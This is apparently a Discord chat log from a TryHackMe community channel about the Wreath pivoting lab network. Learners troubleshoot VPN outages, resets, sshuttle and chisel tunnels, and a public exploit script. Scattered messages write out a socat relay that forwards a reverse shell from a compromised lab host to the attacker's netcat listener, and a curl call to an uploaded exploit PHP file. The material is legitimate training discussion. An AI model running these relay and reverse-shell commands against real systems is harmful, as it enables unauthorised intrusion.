@urban vortex Does Socat work like netcat? When the target responds, it should display the shell? Is there anything else to configure other than socat between my local machine and the compromised server?

#

And I don't need to open a port on the server that serves as a gateway?

urban vortex
urban vortex
carmine wasp
#

If I have understood correctly I am doing :

  1. On my local machine

nc -lvnp 9876

  1. On Prod-Serv :

./socat-shikyo tcp:LOCAL_IP:9876 tcp:10.200.181.150:80,fork

  1. On my local machine

Curl -X POST http://10.200.181.150:80/web/exploit-toto.php -d "a=X"

X the exploit proposed by THM with IP: IP_Local Port: 9876

(Sorry for the rough English)

urban vortex
#

Otherwise it wont work

carmine wasp
#

There is something I don't understand. It is not possible to do this without opening a port on Prod-Serv ?

I'm trying to do this with the "Port Forwarding -- Quiet" technique in Task13 Pivoting Socat.

urban vortex
#

I missed that in your first post my apologies

carmine wasp
#

No problem. It's very kind of you to help me πŸ˜„

urban vortex
carmine wasp
#

I will try again.

  1. on my local machine

socat tcp-l:8001 tcp-l:8000,fork,reuseaddr &

  1. On Prod-Serv

./socat tcp:My_Kali_IP:8001 tcp:10.200.181.150:80,fork &

If I understand correctly here we have a link between my local machine on port 8001 and 10.200.181.150:80. And on my local machine what comes from Git-Serv will be sent on port 8000 through 8001.

  1. I use curl to run the exploit with kali's ip and port 8001?

I don't quite understand how I'm going to get the reverse shell. I'm not sure how I'm going to get the reverse shell, is Socat doing the same thing as netcat and opening it for me?

urban vortex
carmine wasp
#

Ok

I'll put you in screen what I did because I don't understand why I don't communicate with Git-Serv.

urban vortex
#

Your socat on your prod-serv is wrong. You want your TARGET IP. Not the IP you already have access to

carmine wasp
#

OMG I'm so stupid

urban vortex
#

Rerun it, then check your localhost:8000 on your kali

carmine wasp
#

Yes (I forgot to add time to the machine, so it's working again)

#

πŸ˜„

urban vortex
#

there ya go

carmine wasp
#

Thank you. Now I have to get the shell back ^^

#

Is it normal that the connection is not stable?

urban vortex
carmine wasp
#

I went away for a few minutes and when I came back the socket was broken.

If I try to redo the link: I get this error

#

Ok if I change the port it works

faint flare
#

assuming someone messed with the wreath boxes? was fully connected doing my thing and all of the sudden lost connection to everything, now getting a ssh: connect to host 10.200.84.200 port 22: No route to host

#

is voting for a reset and waiting the only thing that can be done?

humble jewel
#

yes unless some other user still on the box fixes it.

slim flicker
#

Hi, can I move somehow to simple cmd in the evil-winrm?

tulip breach
#

hello I am a subscriber, im new and I opened wreath to see what its like and it says "9 days of access left"? will I be able to reset that? i wouldnt have started it if I knew it was limited, and I didnt think it would be limited as a subscriber

vernal epoch
# tulip breach hello I am a subscriber, im new and I opened wreath to see what its like and it ...

"Joining the network requires a 7 day streak or a subscription to TryHackMe. To limit the number of networks which have to stay active at any one point, network access will last for 10 days after joining, at which point you will be automatically be removed; however, rejoining does not require a streak so if you didn't manage to finish within the ten days, you are free to rejoin immediately and keep at it from where you left off. Progress will not be reset."

#

You can join after the ten days period without losing the progress in the room, but make good notes so you can replicate your steps in the network easily

#

If you aren't going to start working on it now, you can just leave the room and join again when you want to focus on the room to get the full 10 days for that

tulip breach
#

thanks

merry robin
#

*sigh*

#

-ban @limpid sluice -ddays 1 Compromised Account -- Nitro Scam

winter lintelBOT
#

πŸ”¨ Banned Hsehwag#9276 indefinitely

merry robin
#

I'm old and slow, okay??

#

πŸ˜†

fair breach
#

your questions and answers will carry over and remain if you re-join

#

(I think you'll just get thrown onto a different wreath network if you re-join after the access timer? Which'll mean needing to download a new VPN file that new network you get placed onto)

fair breach
#

'eh yeha

#

it just depends on how many others are doing wreath

strange bison
#

If you're very unlucky you'll get the same network

fair breach
#

could be a good thing if you've got your environment and notes setup for a specifc network

#

could be a bad thing if there's a few bad eggs on the network

#

swings and roundabouts really

echo spruce
#

Is wreath broken? I'm trying to reach the webserver via the resolved name and it is not loading at all. I am able to ping prod-serv on the terminal so it is alive

thorn girder
carmine wasp
#

Wreath is down ?

I am connected with openvpn and I can't communicate with prod-serv. The network status is "Running".^I regenerated the openvpn file and tried again with the new one, still the same problem. Have you ever had this problem?

#

When I try to connect via ssh I get this error message

#

And when i ping .200

#

And I have the same problem with the attackbox T_T

ashen sleet
#

are you using udp or tcp?

#

try using a different region aswell

carmine wasp
#

Ok I will try

#

For wreath there is no possibility to change region?

#

Does changing the region on the Machines tab have an impact?

carmine wasp
#

ok

ashen sleet
#

u did regen it ?

strange bison
strange bison
ashen sleet
#

wait really?

#

:o

#

i'm such an idiot >.>

#

xD

#

try using the openvpn-troubleshooting for thm

carmine wasp
#

I will try

strange bison
# ashen sleet wait really?

Yea, really. Regions are for the standard THM VPN only. It also doesn't change where the VMs are deployed, they're always in Europe.
Networks are all in that region.

carmine wasp
#

😭

#

(Great tools)

#

I have to change chanel to ask for help in site-bugs?

strange bison
#

The final test WILL FAIL on Network VPNs rather than standard VPNs.

#

It's designed for standard THM VPN connections not networks.

carmine wasp
#

ok but it still looks like a problem with the VPN ?

strange bison
#

Please post again but without redacting IP addresses. It's difficult to troubleshoot with those redacted.

#

They are not sensitive information, or at least they very much shouldn't be

carmine wasp
#

Ok thanks. I'm going to poke around in tech-support.

strange bison
carmine wasp
#

ok

#

Connection with OpenVpn

#

ssh connection to the compromised machine

#

Attempt to ping the compromised machine

strange bison
#

Have you reset the network?

carmine wasp
#

Not this week. I reset it a few days ago and had no problem afterwards.

#

Do I have to do the applications for reset?

autumn finch
#

hi guys, I'm trying to read the contents of id_rsa and it's turning out blank, do we need to reset the network?

urban vortex
autumn finch
urban vortex
echo spruce
#

Is anyone running into issues at the start of wreath connecting to the webserver in-browser. I have added the resolved hostname to /etc/hosts, but when I load the domain, it hangs

frosty barn
#

Seems like the network is fucked up ! cannot interact with gitserver.thm nor ping it.

#

Python exploit does nothing aswell and ... we have only 4/8 agreed to reset the box 😦

#

and discovering hosts through the first machine (with the -sn flag) asks for 53 minutes. WTF blobhuh

#

The only thing I can do is surfing on the webpage (thomaswraith) adn ssh into the 1st machine.

#

waiting for a reset...

urban vortex
wide canyon
#

anyone else having problems with ida_rsa key working in the "WREATH" room? i copied the key, made sure there were no spaces. pasted it into an id_rsa on my kali machine, gave it chmod 600 and tried the ssh -i id_rsa and keep getting publickey permission denied

#

@echo spruce it hanged on me to. i took a few minutes then it just worked.

frosty barn
winter lintelBOT
#

Gave +1 Rep to @wide canyon

wide canyon
#

Oh, I’ll look into pwncat. Thank you. I just don’t know why Im getting permission denied using the ssh -i method. @frosty barn

winter lintelBOT
#

Gave +1 Rep to @frosty barn

frosty barn
wide canyon
#

i figured out the problem was actually using sublime text editor...? why did this stop the id_rsa from working? when I made the same exact key file using gedit the id_rsa key worked

#

i gave them both chmod 600 and the gedit worked while the sublime didn't

#

while creating it with sublime i get this error trying to ssh "Load key "id_rsa": invalid format
root@10.200.57.200: Permission denied (publickey,gssapi-keyex,gssapi-with-mic)."

#

but with gedit, i get no errors

#

hmm ok i fixed it for use with sublime. It just needs a newline character which is weird. I just had to hit enter at the end of -----END OPENSSH PRIVATE KEY-----giving it a blank line at the end. i was able to ssh with this id_rsa using sublime. with gedit i did not have to do this. worked fine ssh'g using the id_rsa.

autumn finch
#

Im having troubles with the nmap scan

#

The prod-servers ip is 10.200.81.200

humble jewel
#

you downloaded the website, not nmap itself

autumn finch
winter lintelBOT
#

Gave +1 Rep to @humble jewel

storm escarp
#

Hi All, Unable to reach the Prod-Server -> 10.200.87.200

storm escarp
wide canyon
#

if you were in active then it will stop the server and you'll have to start it up again. make sure you started the wreath vpn

fading saffron
#

Hey everyone. I'm stuck in the wreath network when I try to use sshuttle. I tried to find the error message everywhere on the internet, but I did find anything... Here is the logs. Does anyone already encountered this error ?

#

└─# sshuttle -r root@10.200.81.200 --ssh-cmd "ssh -i id_rsa" 10.81.200.0/24 -x 10.200.81.200 c : Connected to server. Failed to flush caches: Unit dbus-org.freedesktop.resolve1.service not found. fw: Received non-zero return code 1 when flushing DNS resolver cache.

#

Here it is with a -v

#

─# sshuttle -r root@10.200.81.200 --ssh-cmd "ssh -i id_rsa" 10.81.200.0/24 -x 10.200.81.200 -v Starting sshuttle proxy (version 1.1.0). c : Starting firewall manager with command: ['/usr/bin/python3', '/usr/bin/sshuttle', '-v', '--method', 'auto', '--firewall'] fw: Starting firewall with Python version 3.9.12 fw: ready method name nat. c : IPv6 enabled: Using default IPv6 listen address ::1 c : Method: nat c : IPv4: on c : IPv6: on c : UDP : off (not available with nat method) c : DNS : off (available) c : User: off (available) c : Subnets to forward through remote host (type, IP, cidr mask width, startPort, endPort): c : (<AddressFamily.AF_INET: 2>, '10.81.200.0', 24, 0, 0) c : Subnets to exclude from forwarding: c : (<AddressFamily.AF_INET: 2>, '10.200.81.200', 32, 0, 0) c : (<AddressFamily.AF_INET: 2>, '127.0.0.1', 32, 0, 0) c : (<AddressFamily.AF_INET6: 10>, '::1', 128, 0, 0) c : TCP redirector listening on ('::1', 12300, 0, 0). c : TCP redirector listening on ('127.0.0.1', 12300). c : Starting client with Python version 3.9.12 c : Connecting to server... s: Running server on remote host with /usr/bin/python3 (version 3.6.8) s: latency control setting = True s: auto-nets:False c : Connected to server.

#

fw: setting up. fw: ip6tables -w -t nat -N sshuttle-12300 fw: ip6tables -w -t nat -F sshuttle-12300 fw: ip6tables -w -t nat -I OUTPUT 1 -j sshuttle-12300 fw: ip6tables -w -t nat -I PREROUTING 1 -j sshuttle-12300 fw: ip6tables -w -t nat -A sshuttle-12300 -j RETURN -m addrtype --dst-type LOCAL fw: ip6tables -w -t nat -A sshuttle-12300 -j RETURN --dest ::1/128 -p tcp fw: iptables -w -t nat -N sshuttle-12300 fw: iptables -w -t nat -F sshuttle-12300 fw: iptables -w -t nat -I OUTPUT 1 -j sshuttle-12300 fw: iptables -w -t nat -I PREROUTING 1 -j sshuttle-12300 fw: iptables -w -t nat -A sshuttle-12300 -j RETURN -m addrtype --dst-type LOCAL fw: iptables -w -t nat -A sshuttle-12300 -j RETURN --dest 10.200.81.200/32 -p tcp fw: iptables -w -t nat -A sshuttle-12300 -j RETURN --dest 127.0.0.1/32 -p tcp fw: iptables -w -t nat -A sshuttle-12300 -j REDIRECT --dest 10.81.200.0/24 -p tcp --to-ports 12300 Failed to flush caches: Unit dbus-org.freedesktop.resolve1.service not found. fw: Received non-zero return code 1 when flushing DNS resolver cache.

strange bison
#

Lots of fixes on google for that actual error

fading saffron
strange bison
fading saffron
#

Seems like I had brain issue yesterday

#

Thank you for the help, I'll check that

sturdy cypress
#

@strange bison

strange bison
#

-ban @surreal sail Nitro Phishing. Please secure your account and appeal this ban by emailing bans@tryhackme.com

winter lintelBOT
#

πŸ”¨ Banned abdobzxart#6401 indefinitely

urban vortex
#

I see that the room is locked? Is this for updates?

sharp ice
#

In Wreath?

merry robin
urban vortex
wide canyon
#

How do i fix the connection to wreath? it says its up and running and im connected to the access page but when i ping it, it says unreachable. it happened after being inactive

#

i tried restarting the thm vpn and wreath vpns. logged out of thm and redownloading new wreath config files

wide canyon
#

i feel like 8 people to reset is to many. it seems to crash and hang around this time the past few nights and its barely 3/8

opal viper
compact tartan
#

vin the wreath network, when trying to connecct over rdp to the gitserver, what should be my tunneling command considering i require a second tunnel for taking RDP on port 8985 of the git server? i amusing port forward technique since sshuttle does seem to be exactly compatible with WSL2 (let me know if that's not the case)

#

in*

#

This is the error when i try establishing a tunnel using sshuttle

#

sshuttle -r root@10.200.84.200 --ssh-cmd "ssh -i id_rsa" 10.200.84.0/24 -v
Starting sshuttle proxy (version 1.1.0).
c : Starting firewall manager with command: ['/usr/bin/env', 'PYTHONPATH=/usr/lib/python3/dist-packages', '/usr/bin/sudo', '-p', '[local sudo] Password: ', '/usr/bin/python3', '/usr/bin/sshuttle', '-v', '--method', 'auto', '--firewall']
[local sudo] Password:
fw: Starting firewall with Python version 3.9.12
fw: ready method name nat.
c : IPv6 enabled: Using default IPv6 listen address ::1
c : Method: nat
c : IPv4: on
c : IPv6: on
c : UDP : off (not available with nat method)
c : DNS : off (available)
c : User: off (available)
c : Subnets to forward through remote host (type, IP, cidr mask width, startPort, endPort):
c : (<AddressFamily.AF_INET: 2>, '10.200.84.0', 24, 0, 0)
c : Subnets to exclude from forwarding:
c : (<AddressFamily.AF_INET: 2>, '127.0.0.1', 32, 0, 0)
c : (<AddressFamily.AF_INET6: 10>, '::1', 128, 0, 0)
c : TCP redirector listening on ('::1', 12300, 0, 0).
c : TCP redirector listening on ('127.0.0.1', 12300).
c : Starting client with Python version 3.9.12
c : Connecting to server...
ssh: connect to host 10.200.84.200 port 22: No route to host
c : fatal: failed to establish ssh session (2)

#

with -x argument, same result

#

sshuttle -r root@10.200.84.200 --ssh-cmd "ssh -i id_rsa" 10.200.84.0/24 -x 10.200.84.200 -v
Starting sshuttle proxy (version 1.1.0).
c : Starting firewall manager with command: ['/usr/bin/env', 'PYTHONPATH=/usr/lib/python3/dist-packages', '/usr/bin/sudo', '-p', '[local sudo] Password: ', '/usr/bin/python3', '/usr/bin/sshuttle', '-v', '--method', 'auto', '--firewall']
fw: Starting firewall with Python version 3.9.12
fw: ready method name nat.
c : IPv6 enabled: Using default IPv6 listen address ::1
c : Method: nat
c : IPv4: on
c : IPv6: on
c : UDP : off (not available with nat method)
c : DNS : off (available)
c : User: off (available)
c : Subnets to forward through remote host (type, IP, cidr mask width, startPort, endPort):
c : (<AddressFamily.AF_INET: 2>, '10.200.84.0', 24, 0, 0)
c : Subnets to exclude from forwarding:
c : (<AddressFamily.AF_INET: 2>, '10.200.84.200', 32, 0, 0)
c : (<AddressFamily.AF_INET: 2>, '127.0.0.1', 32, 0, 0)
c : (<AddressFamily.AF_INET6: 10>, '::1', 128, 0, 0)
c : TCP redirector listening on ('::1', 12300, 0, 0).
c : TCP redirector listening on ('127.0.0.1', 12300).
c : Starting client with Python version 3.9.12
c : Connecting to server...
ssh: connect to host 10.200.84.200 port 22: No route to host
c : fatal: failed to establish ssh session (2)

#

now i am getting an error 99, which intially made me think sshuttle is not compatible in WSL2

vernal epoch
# compact tartan sshuttle -r root@10.200.84.200 --ssh-cmd "ssh -i id_rsa" 10.200.84.0/24 -x 10.20...

I think, I was still using wsl2 when I did wreath and didn't have problems with sshuttle
Your error message: ssh: connect to host 10.200.84.200 port 22: No route to host indicates that either you are not connected to the wreath vpn or the network state is not running, so those would be my first troubleshooting steps to check that the vpn is working, the network is running and then can you ssh normally to the 10.200.84.200 machine

opal viper
wide canyon
#

@opal viper nope. still not working. it's actually still running from last night as well. even after closing my vpns and starting back up

stable dune
#

I'am experiencing the same issue as @wide canyon , I was focus, forgot about extending, the network was paused, i started it again and now everything is unreachable. (of course i'am connected to the VPN and network is in running state)

viral wing
#

@fading saffron Hi bro , did you fix the issue with sshuttle , what was the solution ? Kindly let me know , i tried starting and stopping lots of services

fading saffron
viral wing
#

@fading saffron yes please let me know stuck on that since yesterday

fading saffron
#

I just restarted the systemd-resolved.service

viral wing
#

okay , will give it a shot

#

thank you

#

I have used that solution , it says systemd-resolve does not exist , i have installed systemd , but not sure i am able to find systemd-resolve

#

@fading saffron thank you , it resolved Used this thing : sudo systemctl enable systemd-resolved.service

winter lintelBOT
#

Gave +1 Rep to @fading saffron

long crystal
#

any one can help to vote wreath reset, I can't access prod-serv now

#

Current status Reset (7 / 8)

strange bison
#

@long crystal if you're asking for w reset, you need to state what instance you're on

long crystal
#

instance: prod-serv (10.200.73.200)

#

I have linked to wreath network, but I can't access prod-serv instance

autumn tinsel
#

I'm having connection issues too. The server stopped so I restarted it, and now all of the ports on it are filtered. Tried reconnecting to the VPN and whatnot. I seem to also be on a different instance because unfortunately mine is at 1/8 for reset...

long crystal
autumn tinsel
#

Oh well, so much for getting more done with the Wreath network before work... time for me to go.

tidal phoenix
#

Hello!
I can't connect via ssh using id_rsa in the wreath network on the first machine: 10.200.87.200 permission denied (publickey)

pseudo pelican
#

Someone messed up with the ssh authorized_keys file it replaced the legit public key with his own but even worst he messed with system permissions

#

even as root you can't edit the file anymore

tidal phoenix
#

Yess

#

This is annoying

#

Please vote to restart network

pseudo pelican
#

Already did it. But if nothing prevent that troll to mess things up again tho.

tidal phoenix
#

Is 1/8

strange bison
tidal phoenix
#

2/8

strange bison
#

chattr -i file to make it editable again

#

If you're asking for a reset, please make aure you specify what network you're on as there's lots of instances

tidal phoenix
#

Now is 2 auth keys :))

pseudo pelican
winter lintelBOT
#

Gave +1 Rep to @strange bison

tidal phoenix
strange bison
strange bison
#

So you should ask people to help you reset .87.x

tidal phoenix
#

Oke, thx man !

pseudo pelican
tidal phoenix
low vapor
#

could any one please reset the 10.200.87.x networrk if you are on it .

cursive minnow
#

@stoic flicker@strange bison

cursive minnow
#

@strange bison

strange bison
#

-ban @surreal sail -ddays 1 Nitro phish

winter lintelBOT
#

πŸ”¨ Banned bip boup oui tutut#0388 indefinitely

stoic flicker
#

Sorry was driving

robust cloak
#

@steady isle

steady isle
#

-ban 473699796650033162 -ddays 1 nitro phishing

winter lintelBOT
#

πŸ”¨ Banned 473699796650033162 indefinitely

thick fox
#

I just finished this room. It was a great room to learn and brush up on pivoting. It was very well explained.

fossil jewel
#

Task 20 - Hi everyone, has anyone come across this before when running the exploit to pivot inside the network, see output below? I have tried using the old script from the ExploitDB but that didn't work. Using t the new script pinned to this thread the script began to run but then stopped as you can see below:

: [+] Get user list
[+] Found user twreath
[+] Web repository already enabled
[+] Get repositories list
[+] Found repository git-newBie.zip
[+] Add user to repository
[-] Cannot add user to repository

fossil jewel
tidal phoenix
#

Wreath 10.200.87.x is unreacheable

#

From my kali and attack box

tidal phoenix
strange bison
tidal phoenix
#

Who can help me ?

strange bison
#

At the moment? No one

#

Please show everyone more details about the issues you're having

tidal phoenix
strange bison
#

Please show the output of your OpenVPN command

tidal phoenix
#

I don't have more info

#

Not work even attack box :))

strange bison
#

Also be aware that you cannot connect to the Wreath VPN if you are a subscriber with the attackbox running, as the attackbox uses your VPN config file.

tidal phoenix
#

This is problem :))

strange bison
tidal phoenix
#

Yeah man i'm subscriber

strange bison
#

You cannot have the attackbox running if you are trying to connect to the Wreath VPN from your own machine

#

They will conflict

tidal phoenix
#

What ?

strange bison
#

Please clarify your question

tidal phoenix
#

what I'm trying to tell you is that neither my kali and attackbox can't access 10.200.87.x

strange bison
#

Yeah, I understand that.

#

I did not question that.

#

I am telling you that you cannot have the attackbox running if you are attempting to connect to the Wreath VPN.

tidal phoenix
#

my openvpn output

#

its normal

strange bison
#

Do you have the attackbox running at the moment?

tidal phoenix
strange bison
#

No, they're not.

#

The attackbox uses the same VPN configuration file (and thus the same IP address) as the file you download.

tidal phoenix
#

Let me check

strange bison
#

Wreath is not on the regular tryhackme network, thus the attackbox also requires an OpenVPN connection.

strange bison
#

This is fact.

tidal phoenix
#

:))

#

Know that what you are saying is wrong, because in all the rooms where I used 2 machine they had different ip addresses.

strange bison
#

The attackbox will have multiple IP addresses.

tidal phoenix
#

Bro

strange bison
#

I'm not your bro.

tidal phoenix
#

Yeaahh

tidal phoenix
strange bison
#

You're arguing and clearly don't want help. I'm going to stop trying.

strange bison
#

One of them is your Wreath IP.

tidal phoenix
#

Now i have 10.10.226.88

strange bison
#

Arguing with someone when they are trying to help you is just rude

tidal phoenix
#

At attack box

strange bison
tidal phoenix
tidal phoenix
#

I encountered a problem after running this command "firewall-cmd --zone = public -add-port 12123 / tcp", does anyone have any advice?

10.200.87.X

magic citrus
#

hello

#

anyone here to help ?

strange bison
storm orbit
#

Does the wreath network break a lot? I've had connection issues over the last couple of days. Cannot ping the production server anymore.

merry robin
storm orbit
#

It's just a annoying when you make time to work THM and then network doesn't work. Seems to happen often. Three hours later now I'm getting connectivity to prod serv.

merry robin
#

Yeah, I agree -- it's annoying, but I can't think of a solution for it I'm afraid

#

People are always gonna be asshats

strange bison
storm orbit
#

I would pay extra for sure

merry robin
#

That's already allowed

#

See here

#

Message is also pinned

strange bison
#

Not convenient though

merry robin
#

Nope, it is not, but it's available

storm orbit
#

Oh cool. I didn't know that. Any idea how much it is?

merry robin
#

Not a clue I'm afraid. That'll take you straight to the big boss (Skidy)

long karma
#

ok, so wreath network stopped working. can no longer ssh into initial box

#

exploits both on msf, and script do not connect to box

storm orbit
#

Does redownloading the connection pack ever solve the problem? Not sure if that puts you on a different set of boxes or not

long karma
#

i mean... i guess i can try that.

strange bison
strange bison
long karma
#

wulp, the network is busted.

storm orbit
#

I'm still connected and ssh'd to prod server

long karma
storm orbit
#

done

strange bison
#

If you're asking for a reset, state the third octet of the network IPs, that indicates what instance

long karma
#

81

storm orbit
#

85

long karma
#

oh

#

well shit

strange bison
#

Another expert tip is that you can add a vote to reset every hour

long karma
#

πŸ‘

storm orbit
#

The definitive guide to Secure Shell (SSH) tunneling, port redirection, and bending traffic like a boss

long karma
#

annnnd it's back.

long karma
#

lots can go wrong with tunneling

vernal epoch
#

@static elk nitro scam

strange bison
#

-ban @merry spear -ddays 1 Sending phishing scams

winter lintelBOT
#

πŸ”¨ Banned lugia#3177 indefinitely

naive jetty
#

I am trying to do wreath right now but I am stuck at the password hash question

#

I believe someone changed the password because the hash does not line up

loud vessel
#

hey all

#

is anybody on the machine currently ?

strange bison
loud vessel
#

I'm in the starter zone, task 5

#

vpn is fine, tried reconnecting twice, no attackbox turned on, tried resetting

#

can't ping host , unresponsive

strange bison
#

Ping isn't the best test of "is the remote machine alive"

loud vessel
#

I was following the official THM video for help, also I was able to pull off a scan, changing the /etc/hosts file to fix the dns and still couldnt reach the webserver

#

I'm new to this, so any hint would be appreciated

#

Ill figure it out

north portal
strange bison
true girder
humble jewel
steep lily
median kraken
#

hey, just started with wreath network, and not able to ping the network. And not able to access the website http://wreath.thm

Regenerated the vpn file many time, still the same issue

#

Am I missing something?

strange bison
#

Are you using the wreath specific VPN?

median kraken
#

yes

#

added to host and download the wreath vpn file

strange bison
#

Downloaded it, but are you using it?

median kraken
#

yes

strange bison
#

What do you mean by "not able to access?"
Can you show us exactly what you see?

median kraken
strange bison
#

http:// or https:// ?

#

And can you portscan/ping?

median kraken
#

https://

median kraken
#

can't ping and port scan

#

now I can ping, the network has reset and got the new ip when i reloaded the page

strange bison
median kraken
#

and I joined 1 hr ago

strange bison
#

Yeah that's not meant to happen

median kraken
#

Hey, This must me -D. Right?

Task 11: almost last line

strange bison
median kraken
#

having this error while running socat.

Downloaded the binary with this like https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat , which is provided

Am I doing something wrong?

median kraken
#

I completed the Wreath Network Room πŸ˜„

frank ginkgo
#

congrats! : D

rapid echo
#

Network might need a reset, can't connect to the machines.

noble nebula
#

Can't download my wreath vpn config, keep getting a 404.. :/

frank ginkgo
#

rooted, and with that, all of the networks have been rooted! a lot of fun and new techniques here! πŸ˜„

noble nebula
#

Still a 404 when downloading vpn config, anyone facing similar issues?

#

When launching the attackbox, the vpn config inside it is 0 bytes...

noble nebula
#

@strange bison is this something up your alley?

strange bison
#

Or tryhackme staff for that matter.

noble nebula
#

So, no..

#

Saw you helping some people out, figured I'd give it a shot

noble nebula
#

@merry robin ?

frozen orchid
#

I just finished Wreath, kudos to the author of this network! I've leant TONS of new stuff during the process, especially in pivotingπŸ”₯

hearty umbra
#

What is the root user's password hash? /etc/shadow has a hash. but that does not work

#

this does not seem match in the room $6$5IFHGBT1.Z/3EnOs$2GVIAaESdFIXnVdTd<xyz>Fq2cgyYwYzgfB.uY2gxH2dXNiB34YMs9gFpP3UvsQOJ.MkqMP2ZlX.

merry robin
#

As it is, you are correct, some moron has decided to change the password hash. Reset the network and it will go back to what it should be

hearty umbra
strange bison
timber marlin
#

I'm getting 404 when I try to download openvpn config file for this network:( How to fix this?

noble nebula
#

This ^

noble nebula
timber marlin
merry robin
#

That's a known issue -- has been for a while unfortunately.
The site staff are aware of it, but as yet there hasn't been a working fix released.
I believe there might be a workaround floating about (@strange bison, if anyone knows, it'll probably be you πŸ™‚ )

strange bison
merry robin
#

Could well be πŸ˜†

#

@timber marlin @noble nebula try leaving the room and rejoining

noble nebula
strange bison
#

There's no reason to be rude to me

#

You're absolutely not entitled to any help here, especially when you go through pinging random people to demand it.

noble nebula
#

"@strange bison | James is this something up your alley?" yeah looks really 'demanding', also I didn't ping random people, I saw you were helping other people out

timber marlin
#

@noble nebuladid it work for you?

noble nebula
#

Back on topic, leaving and rejoining the room didnt work

timber marlin
#

because for me no
same issue after rejoin

#

oh, i see

wheat spade
#

I need some assistance on Wreath (if this is the right place to ask), has happened twice now that the Wreath network would stop and would need to be started again. Even if started and waiting at least 15mins, I cant reach the webserver via icmp up until a vote reaches 8/8 to reset the network. Is this a common issue? Never mind, seems to be a common issue when sharing the network. varg

cinder nymph
#

Hello everyone, I've been hacking on the Wreath Network for like a week and everything was fine until today. I've reached the 42nd Task yesterday and took a break. Today when I wanted to continue, I can't neither connect to ssh nor scan any ports on the prod-serv (either it's open or not, all the ports returning filtered) I couldn't figure out what's wrong actually and I need help. Thanks in advance..
Edit: I only can view the public facing web server when adding the domain name to /etc/hosts

cinder nymph
cinder nymph
#

I've just finished the Wreath Network and I wanted to thank the author of this network @merry robin for presenting us with a great learning path. I've learnt a lot during my journey and it was an excellent experience for me πŸ™‚

winter lintelBOT
#

Gave +1 Rep to @merry robin

cursive minnow
#

@stoic flicker

cursive minnow
#

@strange bison

stoic flicker
#

-ban 755866724099948604 -ddays 1 nitro scam links

winter lintelBOT
#

πŸ”¨ Banned PURVESH KC#8116 indefinitely

wheat spade
#

Finally managed to work through the Wreath network. Learned some really interesting things that I can apply to real-world engagements. Thanks to the room creators and their effort gone into Wreath πŸ”₯

surreal sail
#

currently doing wreath and i'm on task 6, i git cloned the CVE and tried to run it afterr installing requirements.txt, but when I try i get

#
Traceback (most recent call last):
  File "./CVE-2019-15107.py", line 10, in <module>
    from prompt_toolkit import prompt
ModuleNotFoundError: No module named 'prompt_toolkit'
split harbor
#

@strange bison ⬆️

strange bison
#

-ban @grave garden -ddays 1 Nitro Phishing

winter lintelBOT
#

πŸ”¨ Banned Anishka Shukla#8288 indefinitely

surreal sail
#

sudo pip3 install -r requirements.txt

#

idk

#

i did
cd CVE-2019-15107 && pip3 install -r requirements.txt
first

#

that didn't make it run

#

so i used sudo

#

it didnt cahnge anythingf

#
Name: prompt-toolkit
Version: 3.0.29
Summary: Library for building powerful interactive command lines in Python
Home-page: https://github.com/prompt-toolkit/python-prompt-toolkit
Author: Jonathan Slenders
Author-email: 
License: UNKNOWN
Location: /usr/local/lib/python3.9/dist-packages
Requires: wcwidth
Required-by: 
#

./CVE-2019-15107.py 10.200.90.2001

#

Β―_(ツ)_/Β―

merry robin
#

Why would you bother with sudo when you're already running as root...?

surreal sail
#

I just realised that

surreal sail
#

I'll try again now

#

Same issue D:

merry robin
#

Look, if I can get it working on my phone at ten to one in the morning, 3/4 asleep...
It's a Python script. Don't get much more basic than that πŸ˜†

surreal sail
#

hmm

#

if it works on your phone

#

how come it doesn't work on the attackbox?

#

should i try kali instead?

merry robin
#

It's python. It will work on virtually anything.

#

AttackBox included.

surreal sail
#

I mean

#

It should

#

but it doesn't for some reason

merry robin
#

Oh Lordy. Dependency hell on the AttackBox.
@fair breach your Python install is somehow so royally screwed that a virtual environment isn't enough to get the packages working, fyi

#

Looks like it might be to do with running as root affecting the PATH actually. Weird.

#

That's it working on the AttackBox @surreal sail

#

Albeit a slight workaround.

surreal sail
#

So just do what you did?

merry robin
#

Mhm

surreal sail
#

Ok

#

yep works

fair breach
merry robin
# fair breach Pathing?

TL;DR: even in a virtual env, the base python install wasn't picking up the installed packages

#

To replicate, follow those screenshots but try just running python on that binary

#

Ohhhhh, one second...

#

Ignore me. Think I've sorted it, although it doesn't solve the original problem

fair breach
#

I think there's some pip issues

#

okie dokie well thanks for letting me know. I'll fit in some time to take a look, but if you find anything I'm all ears(:

surreal sail
#

Hi! I'm having difficulties accessing the network. I can't download the openvpn file, neither see the 10.50.x.x on the attack box

#

i left and rejoined several times and reset the machine. but it is still not working

#

can someone help me please?

sly plover
#

hello guys i started solving wreath today and unable to solve some question unable to ping machine any tips ?

#

like if i am searching ip in address bar but still unable to solve question question 3 of task 5

gleaming rapids
#

Oh wow this network is like really fun. I just threw myself into wreath expecting me to not know how to do anything at all, but it is actually pretty easy figure out but not too easy to where I am not learning anything. I know that this is a beginner network, but I wasn't expecting it to be like perfect for my skill level.

eternal valve
#

Hello guys, if there anybody that encountered this problem please help, SO THE PROBLEM IS :
Half way through the tasks, my vpn stopped working, so i downloaded another one, and i just found myself in another subnet with no trace of what i was doing.
Is there any way i can get my first vpn to work because i some settings in mind that would rather tedious to re-do ?

outer umbra
#

I'll be honest, I had to relay my groundwork like 3-4 times doing this. The network would time out or the machines would go down.

On the bright side, I'm extremely comfortable setting up socat and whatnot now.

#

Definitely made me appreciate good documentation of work, too, since having clear notes meant just changing some IPs and relaunching commands.

gleaming rapids
outer umbra
grizzled river
#

hello everyone how are you, can you please help me with the Wreath machine? I don't understand how to make the connection from my local kali linux machine, if you can guide me step by step I would appreciate it.

outer umbra
dusky talon
#

Does anyone have any tips for getting the Personal Computer website to show. My chisel forward proxy is connected successfully and I have Foxy Proxy set to the same forward proxy but when I try to view it in the browser I get: The connection to the server was reset while the page was loading.

north portal
#

i am getting this error while getting the agent from git server using hop listener
<b>Fatal error</b>: Maximum execution time of 30 seconds exceeded in <b>C:\GitStack\gitphp\exploit-ad1tya.php</b> on line <b>2</b>
please can anybody explain

wide canyon
#

is wreath down? I can't ping it?

#

says unreachable

#

I could ping other machines like wonderland just fine

#

i know i could usually ping the wreath machine

#

it just says its unreachable at the moment

#

yeah, sshuttle isn't even working

#

but we 3 more people to reset the box

#

guess i just gotta wait

#

i just voted so i gotta wait another 3 hours then lol

#

no big deal

outer umbra
# wide canyon yeah, sshuttle isn't even working

